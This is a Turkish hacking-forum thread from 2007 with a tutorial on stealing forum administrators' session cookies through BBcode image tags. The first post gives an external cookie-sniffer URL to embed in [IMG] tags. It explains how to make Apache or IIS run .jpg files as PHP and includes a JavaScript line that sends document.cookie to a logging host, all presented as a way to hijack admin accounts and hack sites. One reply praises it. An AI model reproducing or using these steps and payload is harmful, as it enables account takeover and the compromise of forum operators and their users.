PortalliPortalli  ForumForum  AnasayfaAnasayfa  TakvimTakvim  SSSSSS  AramaArama  Kayıt OlKayıt Ol  Üye ListesiÜye Listesi  Kullanıcı GruplarıKullanıcı Grupları  YöneticilerYöneticiler  Giriş yap  

Paylaş | 
 

 BBcode Kullarak Cookie Çalma

Aşağa gitmek 
YazarMesaj
Hacker Namzeti
HTT Üyesi
HTT Üyesi
avatar

Erkek
Mesaj Sayısı : 334
Şehir : www.hackturkiye.ile.biz
Meslek : Hack|Hack
Kayıt tarihi : 30/07/07

MesajKonu: BBcode Kullarak Cookie Çalma   Perş. Ağus. 02, 2007 5:05 pm

</SPAN>



Oncelikle sıze bazı tanımlar yaparak ıse baslamak ıstıyorum.Bu yontemde sıze herhangı bır php forumda(phpbb , vbulletin vs...)nasıl admın gırısı yapacagınızı anlatacagım.Yontem gayet sıkı ve cogu sıtede ıse yaramaktadır.Sizden ricam bu yontemi ogrenırken sabırlı ve azımli davranmanızdır.

Simdi isimize bakalım bu yontem de esas olan sıteye admının cookie siyle girmektir.

Cookie:Ornegın sız santaj.org/sst ye(yani forumumuza) girdiniz.Eger siz gırerken benı hatırlayı ısaretlersenız bilgisayariniza sitenin bılgılerı gırılır ve siteyi actiginizda actıgınız oturumla devam edebilirsiniz.Kısacası cookiler web sayfanızı ziyaret eden ziyaretçilere sonraki girişlerinde tanımak için bırakılan metin dosyalarıdır.

1-> Peki bize cookieler ne gıbı bır faydası olacak?

Eger adminin cookiesini calabilirsek onun kıyle sıteye gırer ve siteyi hackleyebiliriz.

2->Peki yontemi nasıl uygulayacagız?

Genellikle php forumlarda [IMG][/IMG] gıbı resım koyma tagı vardır.Sımdı bız bunu ımg taqı ıcınde [hide]http://antichat.ru/cgi-bin/s.jpgbu resmi çağırırsanız o konuya giren herkesin cookie bilgisi



http://antichat.ru/sniff/log.phpadresinde loglanıcaktır.

Aslında olay bu kadar basıt bunun daha gelismisleride var dir ama sımdılık cok fazla sıtee ub acık mevcut oldugu ıcın onlara degınmıyorum.

3->Peki CeMeTeRY abı sen ıyı guzel anlatmıssın da antichat bu ısı nasıl yapıor yanı resme code fln mı eklıor?Cok mu zor?

Bunun cevabı ıse gayet basıttır arkdaslar ve o kadar kolaydır kı sız bıle aa dersenız yanı.Eger daha onceden IIS veya Apache deneyımı olanalr ıcın bu uygulamayı yapmak cok kolay olabılır ama ben genede genıs bır anlatım yapayım bunada.Ben serverınıze IIS veya Apache kurdugunuzu varsayarak ıslemlere baslıyorum.

Apache kuranlar icin;

Apache kurduğunuz klasore girip ordan conf klasorune httpd isimli dosyayı açıp AddType application/x-httpd-php3 .phtml .php3 .php satırını buluyorsunuz ve sonuna .jpg ekleyıniz.Burada php yi temsil edecek uzantıları seçiyorsunuz ve .jpg uzantısınıda php emrine vermiş oluyorsunuz

ISS ıcın ;

Başlat/çalıştır/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize değerine tıklayın daha sonra yeni değer e çift tıklayıp .jpg yazınız.Bu ıslemele IIS de .jpg ye uzantıya php emrini vermis oldunuz.

Daha sonra yenı bır metin belgesi aciniz

document.location=’http://www.site.com/log.php?’+escape(document·cookie) yazarak atıyoruz cemetery.jpg olarak farklı kaydetmek ondan sonra bu dosyayı jpg uzantısını php nin emrine verdiğiniz server daki bir siteye atıp admin cookie çalmak istediğiniz siteye [IMG][/IMG] bu bbcode arasında çağırmaktır.


Kod:

_________________


Ne Bizi Sevecek Bir Kız Bulabildik;
Ne De Onların Sevebilecekleri Kadar Basit Olabildik.

BENİM DUYGULARIM YOĞUN BE GÜZELİM!!!
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://hackturkiye.buygoo.net/
stings68
System RooT
System RooT
avatar

Mesaj Sayısı : 227
Şehir : Hack ALemi | HackTurkiye
Meslek : Hack | Sanal | Security
Kayıt tarihi : 30/07/07

MesajKonu: Geri: BBcode Kullarak Cookie Çalma   Perş. Ağus. 02, 2007 6:04 pm

eyw saol kardes guzel paylasım ama bızım sıtede olmuyor bosuna denemesınler Very Happy

_________________
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://www.hackturkiye.ile.biz
 
BBcode Kullarak Cookie Çalma
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» amdan kılları alma yöntemi

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 ::  :: WEB Security-
Buraya geçin: